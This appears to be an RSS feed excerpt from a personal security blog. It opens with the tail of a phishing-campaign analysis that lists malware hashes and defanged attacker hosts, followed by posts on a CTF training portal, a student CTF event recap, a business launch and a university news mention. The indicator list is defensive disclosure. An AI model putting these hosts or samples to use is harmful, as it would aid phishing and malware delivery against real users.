post.<br>The UPS.com Cross-Site Scripting vulnerability has since been fixed.</p><p>Hash1: <a href="https://www.virustotal.com/gui/file/841e6458ddc277a1ffdec7907b3e0be029dbe57af88fb11fcceb23f988cf7432/details">841e6458ddc277a1ffdec7907b3e0be029dbe57af88fb11fcceb23f988cf7432</a></p><p>Hash2: <a href="https://www.virustotal.com/gui/file/ae1123c24bb52dce5ec0f0a6c947785012702dc7c3339188baee917721351ff5/detection">ae1123c24bb52dce5ec0f0a6c947785012702dc7c3339188baee917721351ff5</a></p><!--kg-card-begin: markdown--><p>Main hosts: cdn.globalsigncdn.workers[.]dev<br>
divine-bar-3d75.visual-candy.workers[.]dev<br>
m.media-amazon.workers[.]dev</p>
<!--kg-card-end: markdown--><p> </p><p>References:</p><p><a href="https://www.virustotal.com/gui/file/841e6458ddc277a1ffdec7907b3e0be029dbe57af88fb11fcceb23f988cf7432/details">Virus Total Scan</a></p><figure class="kg-card kg-bookmark-card kg-card-hascaption"><a class="kg-bookmark-container" href="https://app.any.run/tasks/96d5d60d-a98d-42b8-80a6-9cfd9d890265/"><div class="kg-bookmark-content"><div class="kg-bookmark-title">INVOICE_1Z7301XR1412220178.docm (MD5: 8EC2C162D57A426A32E27745D9854F93) - Interactive analysis - ANY.RUN</div><div class="kg-bookmark-description">Interactive malware hunting service. Live testing of most type of threats in any environments. No installation and no waiting necessary.</div><div class="kg-bookmark-metadata"><img class="kg-bookmark-icon" src="https://app.any.run/img/favicon.ico" alt="The &quot;Almost&quot; Perfect Phishing C@mpaign"></div></div><div class="kg-bookmark-thumbnail"><img src="https://content.any.run/tasks/96d5d60d-a98d-42b8-80a6-9cfd9d890265/download/screens/ccb214e4-eec3-4a25-a02b-52d4096a99dc/image.jpeg" alt="The &quot;Almost&quot; Perfect Phishing C@mpaign"></div></a><figcaption>AnyRun Interactive analysis of infected document</figcaption></figure><figure class="kg-card kg-bookmark-card kg-card-hascaption"><a class="kg-bookmark-container" href="https://urlscan.io/result/4d8723d5-7b62-4a9f-8ebc-1d55881454a4/"><div class="kg-bookmark-content"><div class="kg-bookmark-title">divine-bar-3d75.visual-candy.workers.dev - urlscan.io</div><div class="kg-bookmark-description">urlscan.io - Website scanner for suspicious and malicious URLs</div><div class="kg-bookmark-metadata"><img class="kg-bookmark-icon" src="https://urlscan.io/img/urlscan_256.png" alt="The &quot;Almost&quot; Perfect Phishing C@mpaign"><span class="kg-bookmark-author">urlscan.io urlscan.io</span><span class="kg-bookmark-publisher">urlscan.io</span></div></div><div class="kg-bookmark-thumbnail"><img src="https://urlscan.io/img/urlscan_256.png" alt="The &quot;Almost&quot; Perfect Phishing C@mpaign"></div></a><figcaption>Suspicious URL Analysis</figcaption></figure><!--kg-card-begin: markdown--><p>Have you got any suggestions or questions for me ? <a href="mailto:hello@flaviu.io">Get in touch!</a></p>
<p>Thank you for reading my article, Until next time!</p>
<p>Your friendly neighbourhood <mark>Hacker.</mark></p>
<!--kg-card-end: markdown-->]]></content:encoded></item><item><title><![CDATA[What does it take to be a web application security consultant?]]></title><description><![CDATA[Very recently, I participated in a CTF. While I was still in the zone, I came across an interesting post on LinkedIn that said What does it take to be a web application security consultant?]]></description><link>https://flaviu.io/what-does-it-take-to-be-a-application-security-consultant/</link><guid isPermaLink="false">60dc71106351be078041755e</guid><category><![CDATA[cybersecurity]]></category><category><![CDATA[hacking]]></category><category><![CDATA[achievements]]></category><category><![CDATA[learning]]></category><dc:creator><![CDATA[Flaviu Popescu]]></dc:creator><pubDate>Thu, 01 Jul 2021 09:31:58 GMT</pubDate><media:content url="https://flaviu.io/content/images/2021/06/websec.jpg" medium="image"/><content:encoded><![CDATA[<hr><img src="https://flaviu.io/content/images/2021/06/websec.jpg" alt="What does it take to be a web application security consultant?"><p>Very recently, I participated in a CTF. While I was still in the zone, I came across an interesting post on LinkedIn that said What does it take to be a web application security consultant?</p><p>The author was <a href="https://www.mdsec.co.uk/staff/marcus-pinto/">Marcus Pinto</a>, Owner of <a href="https://www.mdsec.co.uk/">MDSec</a>, a security consulting and education company with expertise that is backed by the <a href="https://www.mdsec.co.uk/2015/02/the-mobile-application-hackers-handbook/">Web and Mobile Application Hackers Handbook</a> series.</p><p>The post stated that if you want to see what it takes to be a web application security consultant, check out the free training platform. To join, the applicant would send an e-mail to <a href="mailto:contact@mdsec.co.uk">contact@mdsec.co.uk</a> and request an account on the free CTF portal. They stated that if you knock down all the challenges expect a call (perfect for job seekers!).</p><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://flaviu.io/content/images/2021/07/mdsec.PNG" class="kg-image" alt="What does it take to be a web application security consultant?" loading="lazy" width="850" height="929" srcset="https://flaviu.io/content/images/size/w600/2021/07/mdsec.PNG 600w, https://flaviu.io/content/images/2021/07/mdsec.PNG 850w" sizes="(min-width: 720px) 720px"><figcaption>MDSec LinkedIn Post</figcaption></figure><p>This got me intrigued. What does a CTF set up by a top security company look like?</p><p>Sent an e-mail and asked for access, got an e-mail back very promptly with the account details and a few instructions.</p><p><strong>Content:</strong></p><p>The content here will give you insight into:</p><ul><li>Uncovering subtle flaws in applications</li><li>Expanding your armory of tools and techniques</li><li>Writing custom code (burp extensions</li><li>Practicing key vulnerabilities</li></ul><hr><p><strong>Prerequisite Knowledge:</strong></p><p>It is assumed that you have a working knowledge of:</p><ul><li>Burp Proxy, Intruder, Repeater, Scanner</li><li>At least one programming language (python etc.)</li><li>HTML</li><li>Basic understanding of SSL</li><li>HTTP</li><li>JavaScript</li><li>The OWASP Top 10</li><li>XSS, SQLi, Traversal</li></ul><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://flaviu.io/content/images/2021/06/image-7.png" class="kg-image" alt="What does it take to be a web application security consultant?" loading="lazy" width="1766" height="1109" srcset="https://flaviu.io/content/images/size/w600/2021/06/image-7.png 600w, https://flaviu.io/content/images/size/w1000/2021/06/image-7.png 1000w, https://flaviu.io/content/images/size/w1600/2021/06/image-7.png 1600w, https://flaviu.io/content/images/2021/06/image-7.png 1766w" sizes="(min-width: 720px) 720px"><figcaption>CTF portal MDSec</figcaption></figure><p>The starting point is the challenges in the interview section. The difficulty ranges from low to hard. There is no requirement to connect to a private network, although Burp or Owasp ZAP will be needed later. Each challenge has an introductory description and sometimes even a hint to help you get started.</p><figure class="kg-card kg-gallery-card kg-width-wide kg-card-hascaption"><div class="kg-gallery-container"><div class="kg-gallery-row"><div class="kg-gallery-image"><img src="https://flaviu.io/content/images/2021/06/ctf.PNG" width="1751" height="1159" loading="lazy" alt="What does it take to be a web application security consultant?" srcset="https://flaviu.io/content/images/size/w600/2021/06/ctf.PNG 600w, https://flaviu.io/content/images/size/w1000/2021/06/ctf.PNG 1000w, https://flaviu.io/content/images/size/w1600/2021/06/ctf.PNG 1600w, https://flaviu.io/content/images/2021/06/ctf.PNG 1751w" sizes="(min-width: 720px) 720px"></div><div class="kg-gallery-image"><img src="https://flaviu.io/content/images/2021/06/ctf2.PNG" width="734" height="580" loading="lazy" alt="What does it take to be a web application security consultant?" srcset="https://flaviu.io/content/images/size/w600/2021/06/ctf2.PNG 600w, https://flaviu.io/content/images/2021/06/ctf2.PNG 734w" sizes="(min-width: 720px) 720px"></div></div></div><figcaption>Challange Sample MDSec</figcaption></figure><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://flaviu.io/content/images/2021/06/image-9.png" class="kg-image" alt="What does it take to be a web application security consultant?" loading="lazy" width="2000" height="424" srcset="https://flaviu.io/content/images/size/w600/2021/06/image-9.png 600w, https://flaviu.io/content/images/size/w1000/2021/06/image-9.png 1000w, https://flaviu.io/content/images/size/w1600/2021/06/image-9.png 1600w, https://flaviu.io/content/images/size/w2400/2021/06/image-9.png 2400w" sizes="(min-width: 720px) 720px"><figcaption>Bypass the UI</figcaption></figure><p>My aim is to share this great opportunity with those looking for a job within the UK. It is also great for those who like a challenge and hands-on practice.</p><p>MDSec also offers the following training:</p><ul><li><a href="https://www.mdsec.co.uk/training/adversary-simulation-red-team-tactics/">Adversary Simulation and Red Team Tactics</a></li><li><a href="https://www.mdsec.co.uk/training/beyond-the-web-application-hackers-handbook-advanced/">Beyond the Web Application Hackers Handbook (Advanced)</a></li><li><a href="https://www.mdsec.co.uk/training/mahh-training-live/">The Mobile Application Hackers Handbook, Live Edition</a></li><li><a href="https://www.mdsec.co.uk/training/wahh-live-training/">The Web Application Hackers Handbook, Live Edition (Beginner Course)</a></li></ul><p>I am <u>not affiliated or being paid to advertise</u> the above courses. If you like or could not solve the challenges, you can sign up for the (Advanced) course (in this case). This will teach you the methodology you need to solve them.</p><hr><h3 id="conclusions">Conclusions</h3><p><strong>So what does it take to be a web application security consultant?</strong></p><hr><p>For some companies it takes a Cyber Security degree, and for some it could be as little as solving web app challenges as proof of your skill.</p><p>Application security is fast becoming the most challenging aspect of information technology. Not surprisingly, it drives demand for highly skilled consultants.</p><p><strong>Top Required Skills</strong> for a <strong>Security Consultant</strong></p><p>Students planning to become security consultants should learn hard skills such as computer programming, network, and security configuration. Taking courses like cloud computing infrastructure and services, network and security foundations, will prepare you to understand the complicated technical aspects of security consulting.</p><p>Though it&apos;s natural to gravitate towards certain soft skills over others, students can highly strengthen areas such as communication, problem-solving, and leadership skills by obtaining a degree. Courses in critical thinking and logic, communication, and managing IT can prepare you for leadership in the field.</p><p>Security consultants need to engage in critical thinking to analyse security issues and respond quickly to breaches&#x2014;or even better, find problems before they arise. Communication is also very essential, as they must communicate with top executives about the company&apos;s security operations, outlining issues so that managers can both understand and make informed decisions. Security consultants may need to communicate via written reports or through oral presentations, and they may also be called upon to tutor non-IT staff in best practices.</p><p>Security consultants who develop leadership skills and strong management techniques can advance to oversee entire departments and projects. Many companies employ teams of IT personnel, which good managers can lead to implement and maintain their cybersecurity protocols.</p><hr><p><strong>About MDSec&apos;s Web Challenges</strong></p><p>I thoroughly enjoyed the challenges so far. You can see I still have one challenge left to complete from the Interview section.</p><p>You can probably imagine a few of the challenges take time to figure out. Especially the challenges that you have not encountered before. There are nine more labs to which I do not have access yet, but I assume each lab will be unlocked after I complete the Interview section.</p><p>The exercises were very realistic to what kind of vulnerabilities are hiding in modern web applications. I like Web testing, but there is so much to it. The best approach, in my opinion, is practicing; you will get a lot of exposure and gain knowledge with a hands-on approach from different sources. </p><p>There are a lot of platforms paid and free to practice and, by sticking to just one or two, in my opinion, you limit yourself. Explore and find different avenues every time an opportunity is presented.</p><p>PS: Don&apos;t ask Marcus for hints! You won&apos;t get any. &#x1F607;</p><!--kg-card-begin: markdown--><p>Have you got any suggestions or questions for me ? <a href="mailto:hello@flaviu.io">Get in touch!</a></p>
<p>Thank you for reading my article, Until next time!</p>
<p>Your friendly neighbourhood <mark>Hacker.</mark></p>
<!--kg-card-end: markdown-->]]></content:encoded></item><item><title><![CDATA[Le Tour Du Hack 2021]]></title><description><![CDATA[Welcome! I'm glad you're here. We need more people like you.
This blog will be about the LTDH21 annual flagship event organised by ENUSEC - a student society based in Edinburgh interested in all aspects of security.
If you're planning to make a living in defense, you have to think like the offense.]]></description><link>https://flaviu.io/le-tour-du-hack-2021/</link><guid isPermaLink="false">60d5c2b26351be0780417393</guid><category><![CDATA[cybersecurity]]></category><category><![CDATA[hacking]]></category><category><![CDATA[achievements]]></category><dc:creator><![CDATA[Flaviu Popescu]]></dc:creator><pubDate>Fri, 25 Jun 2021 14:17:21 GMT</pubDate><media:content url="https://flaviu.io/content/images/2021/06/CTF.jpg" medium="image"/><content:encoded><![CDATA[<hr><blockquote>&quot;Life is not a problem to be solved, but a reality to be experienced.&quot; Soren Kierkegaard</blockquote><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://flaviu.io/content/images/2021/06/reality.jpg" class="kg-image" alt="Le Tour Du Hack 2021" loading="lazy" width="640" height="426" srcset="https://flaviu.io/content/images/size/w600/2021/06/reality.jpg 600w, https://flaviu.io/content/images/2021/06/reality.jpg 640w"><figcaption>Reality Ahead!</figcaption></figure><img src="https://flaviu.io/content/images/2021/06/CTF.jpg" alt="Le Tour Du Hack 2021"><p>Welcome! I&apos;m glad you&apos;re here. We need more people like you.</p><p>This blog will be about the LTDH21 annual flagship event organised by ENUSEC - a student society interested in all aspects of security based in Edinburgh. This is not a walkthrough although I plan to cover a few challenges that we solved in a future blog post.</p><p>If you&apos;re planning to make a living in defense, you have to think like the offense.</p><p>Participate and learn to win in Capture the Flag (CTF). These types of competitions are based on disciplines of professional computer security into short objective and quantifiable exercises. The main focus area for CTF competitions is to measure the vulnerability discovery, exploit development, toolkit creating, and operational tradecraft.</p><p>Whether you want to succeed at CTFs or in a computer security professional job, you&apos;ll need to become an expert in at least one of these disciplines. Ideally as many as possible.</p><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://flaviu.io/content/images/2021/06/discipline.jpg" class="kg-image" alt="Le Tour Du Hack 2021" loading="lazy" width="640" height="480" srcset="https://flaviu.io/content/images/size/w600/2021/06/discipline.jpg 600w, https://flaviu.io/content/images/2021/06/discipline.jpg 640w"><figcaption>D C R</figcaption></figure><hr><p>A little bit about CTFs if you&apos;ve never participated in one before. CTFs are events that are usually hosted at information security conferences, These events consist of a series of challenges that vary in their degree of difficulty, and that require participants to exercise different skillsets to solve. Once an individual challenge is solved, a &quot;flag&quot; is given to the player and they submit this flag to the CTF server to earn points. Players can be lone wolves who attempt the various challenges by themselves, or they can work with others to attempt to score the highest number of points as a team.</p><p>CTF events are usually timed, and the points are totalled once the time has expired. The winning player / team will be the one that solved the most challenges and thus secured the highest score.</p><p>Types of Events - The two most common types are:</p><hr><p>Red Team/Blue Team - In this style of event the red team attempts to capture flags while the blue team attempts to defend the various flags from being captured.<br></p><p>Red Team - Usually involves one or more people, working alone or on a team, who attempt to capture various flags while there is no team defending them.</p><p>Types of Challenges - Some popular areas of focus are:</p><hr><p>Programming - Usually require some sort of programming to solve. In most cases, it will involve a mixture of programming and some reverse engineering.<br></p><p>Crypto - feature common &quot;real world&quot; algorithms or scenarios that often include the ever-popular ransomware type of malware.<br></p><p>Web - Usually vulnerabilities that are in OWASP top 10.<br></p><p>Reverse Engineering - Typically the process of taking a compiled machine code - bytecode program and converting it back to a more human readable format.<br></p><p>OSINT - Known as Open-source intelligence, you will be required to dig deep to find old information like a user&apos;s first tweet for example.<br></p><p>Pwn - In this challenges you usually have to buffer overflows, by using the ctf framework called pwntools you will dev your python exploit.<br></p><p>Misc - miscellaneous challenges these are a bit random, can be various types.</p><hr><p>Okay, let&apos;s talk about the event. </p><p>I was notified about this virtual event taking place by a fellow member of the Ethical Hacking Society at GCU, I never participated before in any of ENUSEC&apos;s CTFs, I know their first Le Tour Du Hack took place in 2017. I simply couldn&apos;t let the opportunity pass, as usual I am very busy, involved in a few projects but I thought; what&apos;s the worst that could happen? I must try this CTF. </p><p>So I signed up, the event was running for a <strong><strong>2 day CTF</strong></strong> for all abilities! Top 3 teams to win the following Prizes:</p><p><strong><strong>1st Place</strong></strong> -&gt; &#xA3;1000</p><p><strong><strong>2nd Place</strong></strong> -&gt; &#xA3;500</p><p><strong><strong>3rd Place</strong></strong> -&gt; &#xA3;250</p><p>And they also had <strong><strong>50 free LTDH21 swag bags </strong></strong>to a lucky 50 participants, including a T-shirt and other goodies, Thanks to <a href="https://secureworks.com/">SecureWorks</a> for sponsoring this wonderful event.</p><p>The event started on Sat, 19 Jun 2021 at 10:00 am and it was finishing on Sun, 20 Jun 2021, 19:00 BST. To begin with we were a team of two for most of Saturday and then in the evening I seen another mate was competing alone so I invited him to join us. </p><p>Within two hours we already had over 4k points and grinding away to climb the leaderboard, we were on 8th and rocking. We had managed to complete <strong>30</strong> challenges from the misc, reverse engineering, osint (trivia), and web categories. I was chuffed with the result so far because I wasn&apos;t thinking we would do so well. My personal aim was to be in Top10 at least and just enjoy the event. </p><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://flaviu.io/content/images/2021/06/image.png" class="kg-image" alt="Le Tour Du Hack 2021" loading="lazy" width="1890" height="559" srcset="https://flaviu.io/content/images/size/w600/2021/06/image.png 600w, https://flaviu.io/content/images/size/w1000/2021/06/image.png 1000w, https://flaviu.io/content/images/size/w1600/2021/06/image.png 1600w, https://flaviu.io/content/images/2021/06/image.png 1890w" sizes="(min-width: 720px) 720px"><figcaption>GCU_CRACKERS Saturday Scoreboard</figcaption></figure><p>Finished the saturday around 23.00 and started again on Sunday we were mainly going over the challenges we couldn&apos;t solve the previous day. I convinced a few other mates to join and we were now a team of five. It was a slow day because we had only the hardest of challenges to solve, we then started dropping a few places on the leaderboard however I was still happy that we remained in Top 10 till nearly towards the end of the event, we were not chasing to win this event but to have fun, we had a tiny team put together very fast at last second unlike other teams who had 10 to 15 members. &#x1F440; </p><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://flaviu.io/content/images/2021/06/image-1.png" class="kg-image" alt="Le Tour Du Hack 2021" loading="lazy" width="1811" height="558" srcset="https://flaviu.io/content/images/size/w600/2021/06/image-1.png 600w, https://flaviu.io/content/images/size/w1000/2021/06/image-1.png 1000w, https://flaviu.io/content/images/size/w1600/2021/06/image-1.png 1600w, https://flaviu.io/content/images/2021/06/image-1.png 1811w" sizes="(min-width: 720px) 720px"><figcaption>GCU_CRACKERS Sunday Scoreboard</figcaption></figure><p>We managed to solve another 7 challenges and settled on 11th place. We were really close to a few Web challenges but couldn&apos;t quite figure out the last part to get the flags. </p><p>I have to say I <strong>totally enjoyed</strong> this CTF and I will definitely recommend it to beginners, I would say the challenges were not too hard, unlike other events I have been such as <a href="https://www.hackthebox.eu/universities/university-ctf-2020">Hack The Box University CTF</a>, <a href="https://tryhackme.com/hackback2">Try Hack Me (HackBack)</a> or <a href="https://pwned.sigint.mx/">pwnED</a>.</p><figure class="kg-card kg-gallery-card kg-width-wide kg-card-hascaption"><div class="kg-gallery-container"><div class="kg-gallery-row"><div class="kg-gallery-image"><img src="https://flaviu.io/content/images/2021/06/chall.PNG" width="1729" height="992" loading="lazy" alt="Le Tour Du Hack 2021" srcset="https://flaviu.io/content/images/size/w600/2021/06/chall.PNG 600w, https://flaviu.io/content/images/size/w1000/2021/06/chall.PNG 1000w, https://flaviu.io/content/images/size/w1600/2021/06/chall.PNG 1600w, https://flaviu.io/content/images/2021/06/chall.PNG 1729w" sizes="(min-width: 720px) 720px"></div><div class="kg-gallery-image"><img src="https://flaviu.io/content/images/2021/06/chall1.PNG" width="1728" height="999" loading="lazy" alt="Le Tour Du Hack 2021" srcset="https://flaviu.io/content/images/size/w600/2021/06/chall1.PNG 600w, https://flaviu.io/content/images/size/w1000/2021/06/chall1.PNG 1000w, https://flaviu.io/content/images/size/w1600/2021/06/chall1.PNG 1600w, https://flaviu.io/content/images/2021/06/chall1.PNG 1728w" sizes="(min-width: 720px) 720px"></div><div class="kg-gallery-image"><img src="https://flaviu.io/content/images/2021/06/chall3.PNG" width="1784" height="1165" loading="lazy" alt="Le Tour Du Hack 2021" srcset="https://flaviu.io/content/images/size/w600/2021/06/chall3.PNG 600w, https://flaviu.io/content/images/size/w1000/2021/06/chall3.PNG 1000w, https://flaviu.io/content/images/size/w1600/2021/06/chall3.PNG 1600w, https://flaviu.io/content/images/2021/06/chall3.PNG 1784w" sizes="(min-width: 720px) 720px"></div></div></div><figcaption>Challenges LTDH21</figcaption></figure><figure class="kg-card kg-gallery-card kg-width-wide kg-card-hascaption"><div class="kg-gallery-container"><div class="kg-gallery-row"><div class="kg-gallery-image"><img src="https://flaviu.io/content/images/2021/06/image-2-1.png" width="1767" height="1138" loading="lazy" alt="Le Tour Du Hack 2021" srcset="https://flaviu.io/content/images/size/w600/2021/06/image-2-1.png 600w, https://flaviu.io/content/images/size/w1000/2021/06/image-2-1.png 1000w, https://flaviu.io/content/images/size/w1600/2021/06/image-2-1.png 1600w, https://flaviu.io/content/images/2021/06/image-2-1.png 1767w" sizes="(min-width: 720px) 720px"></div><div class="kg-gallery-image"><img src="https://flaviu.io/content/images/2021/06/76566db6-edf5-4bdd-ac15-a2701f4baeee.png" width="1609" height="935" loading="lazy" alt="Le Tour Du Hack 2021" srcset="https://flaviu.io/content/images/size/w600/2021/06/76566db6-edf5-4bdd-ac15-a2701f4baeee.png 600w, https://flaviu.io/content/images/size/w1000/2021/06/76566db6-edf5-4bdd-ac15-a2701f4baeee.png 1000w, https://flaviu.io/content/images/size/w1600/2021/06/76566db6-edf5-4bdd-ac15-a2701f4baeee.png 1600w, https://flaviu.io/content/images/2021/06/76566db6-edf5-4bdd-ac15-a2701f4baeee.png 1609w" sizes="(min-width: 720px) 720px"></div></div></div><figcaption>Scoreboard, Top 10 teams</figcaption></figure><p>Congrats to <a href="https://sigint.mx/">SIGINT</a>, crOwn and <a href="https://hacksoc.co.uk/">theIgloo </a>(Abertey Hackers) for winning the competition!</p><p>And many thanks for my fellow team mates for their participation in the CTF, couldn&apos;t do it without you. We have learned a ton and had a great weekend, If time allows; I will post a follow up blog of how we solved a few of the challenges.</p><p>I hope face to face CTFs will be allowed again soon. I&apos;m getting flashbacks of &#x1F863; our last in person CTF.</p><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://flaviu.io/content/images/2021/06/image-6.png" class="kg-image" alt="Le Tour Du Hack 2021" loading="lazy" width="2000" height="1333" srcset="https://flaviu.io/content/images/size/w600/2021/06/image-6.png 600w, https://flaviu.io/content/images/size/w1000/2021/06/image-6.png 1000w, https://flaviu.io/content/images/size/w1600/2021/06/image-6.png 1600w, https://flaviu.io/content/images/2021/06/image-6.png 2048w" sizes="(min-width: 720px) 720px"><figcaption>pwnED 2020 , 4th Place</figcaption></figure><p>To be continued ...</p><!--kg-card-begin: markdown--><p>Have you got any suggestions for me ? Get in touch!</p>
<p>Thank you for reading my article, Until next time!</p>
<p>Your friendly neighbourhood <mark>Hacker.</mark></p>
<!--kg-card-end: markdown-->]]></content:encoded></item><item><title><![CDATA[Octavis.io - We have officially launched!]]></title><description><![CDATA[I started this blog so that I could share with you my findings when it comes to vulnerabilities. As you may have noticed there has not been any significant findings of late, this is not because I have been looking, in fact quite the opposite.]]></description><link>https://flaviu.io/octavis-officially-launched/</link><guid isPermaLink="false">60c1f4136351be0780417181</guid><category><![CDATA[octavis.io]]></category><category><![CDATA[start-up]]></category><category><![CDATA[web design]]></category><category><![CDATA[search engine optimisation]]></category><category><![CDATA[web management]]></category><category><![CDATA[octavis]]></category><dc:creator><![CDATA[Flaviu Popescu]]></dc:creator><pubDate>Thu, 10 Jun 2021 14:51:05 GMT</pubDate><media:content url="https://flaviu.io/content/images/2021/06/smile.jpg" medium="image"/><content:encoded><![CDATA[<hr><img src="https://flaviu.io/content/images/2021/06/smile.jpg" alt="Octavis.io - We have officially launched!"><p>I started this blog so that I could share with you my findings when it comes to vulnerabilities. As you may have noticed there has not been any significant findings of late, this is not because I have been looking, in fact quite the opposite.</p><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://flaviu.io/content/images/2021/06/looking.jpg" class="kg-image" alt="Octavis.io - We have officially launched!" loading="lazy" width="1920" height="1080" srcset="https://flaviu.io/content/images/size/w600/2021/06/looking.jpg 600w, https://flaviu.io/content/images/size/w1000/2021/06/looking.jpg 1000w, https://flaviu.io/content/images/size/w1600/2021/06/looking.jpg 1600w, https://flaviu.io/content/images/2021/06/looking.jpg 1920w" sizes="(min-width: 720px) 720px"><figcaption>looking</figcaption></figure><p>I had an idea over a year ago about creating a business that would provide much needed digital services at an competitive price. I wanted the business to be the champion for small-to-medium businesses, a place where they could go and feel that we as a business cared about them and their business, not just our bottom line. We feel that if we help others and we are fair with our offerings, the wheel will turn round.</p><blockquote>&quot;The wheel of fortune turns round incessantly, and who can say to himself, I shall today be uppermost.&quot;</blockquote><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://flaviu.io/content/images/2021/06/do-something-great.jpg" class="kg-image" alt="Octavis.io - We have officially launched!" loading="lazy" width="1920" height="1280" srcset="https://flaviu.io/content/images/size/w600/2021/06/do-something-great.jpg 600w, https://flaviu.io/content/images/size/w1000/2021/06/do-something-great.jpg 1000w, https://flaviu.io/content/images/size/w1600/2021/06/do-something-great.jpg 1600w, https://flaviu.io/content/images/2021/06/do-something-great.jpg 1920w" sizes="(min-width: 720px) 720px"><figcaption>Do Something Great!</figcaption></figure><p>We wanted to create a business and combine two services that originate from our background skills, User Experience/Interface with Design Innovation and Cyber Security. </p><p>What started off a very ambitious project by joining two of the most needed services Cyber Security and Digital Marketing. Besides the services we offer now we had planned to offer Security services, we soon realised this would be too intensive to start, so we scaled back. This will allow room for personal development (yayy!), although these services will be added in due course.</p><p>When I have an idea, I research, research and research more. This is where I have been.</p><p>There are a multitude of agencies and freelancers building websites but not many create with UX/UI, and most importantly <strong>security </strong>in mind. This is one aspect where we differentiate from our competitors, we help our customers make the best choices and guide them every step of the way to achieve the end goal.</p><p>The sites are built using modern web design techniques and the latest technology therefore empowered for high performance, responsive across many devices, highly customisable and <strong>offensive security</strong> proofed. </p><blockquote>&quot;Don&apos;t run before you can crawl.&quot; </blockquote><p>We built our website from the bottom up ourselves and researched into the services that were the most sought after by SMEs. We are currently offering <a href="https://octavis.io/website-design-and-development/">Website Design and Development</a>, <a href="https://octavis.io/search-engine-optimisation/">Search Engine Optimisation</a> and <a href="https://octavis.io/website-management/">Website Management</a>. We have seen other competitors provide these services at exorbitant rates, and wanted to make them more accessible.</p><p>One aspect of the business that we are most proud of it the <strong>charitable </strong>side. We could not find anyone else offering this service. Providing help through building free websites to not-for-profit newly established charities. We look forward to getting involved in projects with a cause. Find more about this at <a href="https://octavis.io/charitable-organisations/">Charity</a>.</p><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://flaviu.io/content/images/2021/06/together-we-create.jpg" class="kg-image" alt="Octavis.io - We have officially launched!" loading="lazy" width="1920" height="1080" srcset="https://flaviu.io/content/images/size/w600/2021/06/together-we-create.jpg 600w, https://flaviu.io/content/images/size/w1000/2021/06/together-we-create.jpg 1000w, https://flaviu.io/content/images/size/w1600/2021/06/together-we-create.jpg 1600w, https://flaviu.io/content/images/2021/06/together-we-create.jpg 1920w" sizes="(min-width: 720px) 720px"><figcaption>Together WE Create!</figcaption></figure><p>Starting a business has proved to have its ups and down. It has so far had more ups. It has been great learning a whole host of new skills and meeting potential clients as we did not see it attracting attention so soon. </p><p>Interested in any of our services? Find us at <a href="https://octavis.io/">Octavis.io</a>, book a meeting and choose a day and time that suits you.<br></p><p>We cannot wait to see where the business takes us, and it will be interesting to see what happens when we add Cyber Security services. If you made it this far, Thank you very much! Have you got any feedback for us? &#xA0;hello[at]octavis.io</p><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://flaviu.io/content/images/2021/06/to-be-continued.jpg" class="kg-image" alt="Octavis.io - We have officially launched!" loading="lazy" width="1920" height="1280" srcset="https://flaviu.io/content/images/size/w600/2021/06/to-be-continued.jpg 600w, https://flaviu.io/content/images/size/w1000/2021/06/to-be-continued.jpg 1000w, https://flaviu.io/content/images/size/w1600/2021/06/to-be-continued.jpg 1600w, https://flaviu.io/content/images/2021/06/to-be-continued.jpg 1920w" sizes="(min-width: 720px) 720px"><figcaption>To Be Continued!</figcaption></figure>]]></content:encoded></item><item><title><![CDATA[GCU's Student News Page]]></title><description><![CDATA[GCU's student news got in touch with me after reading the article I had written about Red Hat. I am pleased to say that I have been featured on my University's Student News page due to the vulnerability disclosure.]]></description><link>https://flaviu.io/gcu-student-news-cyber-security/</link><guid isPermaLink="false">601152c21679673a38c4c100</guid><category><![CDATA[cybersecurity]]></category><dc:creator><![CDATA[Flaviu Popescu]]></dc:creator><pubDate>Wed, 27 Jan 2021 12:39:26 GMT</pubDate><media:content url="https://flaviu.io/content/images/2021/02/flav-new.jpg" medium="image"/><content:encoded><![CDATA[<img src="https://flaviu.io/content/images/2021/02/flav-new.jpg" alt="GCU&apos;s Student News Page"><p></p><p>GCU&apos;s student news got in touch with me after reading the article I had written about Red Hat. I am pleased to say that I have been featured on my University&apos;s Student News page due to the vulnerability disclosure. &#x1F92F;</p><hr><figure class="kg-card kg-bookmark-card kg-card-hascaption"><a class="kg-bookmark-container" href="https://www.gcu.ac.uk/student/news/studentnewsredhatwebsite/"><div class="kg-bookmark-content"><div class="kg-bookmark-title">GCU Ethical Hacking student identifies major website flaws for massive software company | GCU</div><div class="kg-bookmark-description">A GCU Ethical Hacking student has impressed a large software company for using their skills to fix some significant errors found on their website.</div><div class="kg-bookmark-metadata"><span class="kg-bookmark-author">GCU</span><span class="kg-bookmark-publisher">digitalteamgcu.ac.uk</span></div></div><div class="kg-bookmark-thumbnail"><img src="https://www.gcu.ac.uk/student/news/studentnewsredhatwebsite/900x440%20red%20hat.jpg" alt="GCU&apos;s Student News Page"></div></a><figcaption>GCU Student News Page</figcaption></figure><hr><p>It pays off to be curious, explore and push boundaries.</p><p>It&apos;s exciting and eye opening how my journey has been over the last year.</p><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://flaviu.io/content/images/2021/01/journey.jpg" class="kg-image" alt="GCU&apos;s Student News Page" loading="lazy" width="1920" height="1078" srcset="https://flaviu.io/content/images/size/w600/2021/01/journey.jpg 600w, https://flaviu.io/content/images/size/w1000/2021/01/journey.jpg 1000w, https://flaviu.io/content/images/size/w1600/2021/01/journey.jpg 1600w, https://flaviu.io/content/images/2021/01/journey.jpg 1920w" sizes="(min-width: 720px) 720px"><figcaption>journey</figcaption></figure><p>&quot;I love what I&apos;m doing and will continue to do it, and there&apos;s nothing you can do to stop me.&quot;</p><hr><p>Thanks everyone for the continuous motivation, love and support. It really means a lot.<br></p><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://flaviu.io/content/images/2021/01/dosomethingreat.jpg" class="kg-image" alt="GCU&apos;s Student News Page" loading="lazy" width="1920" height="1280" 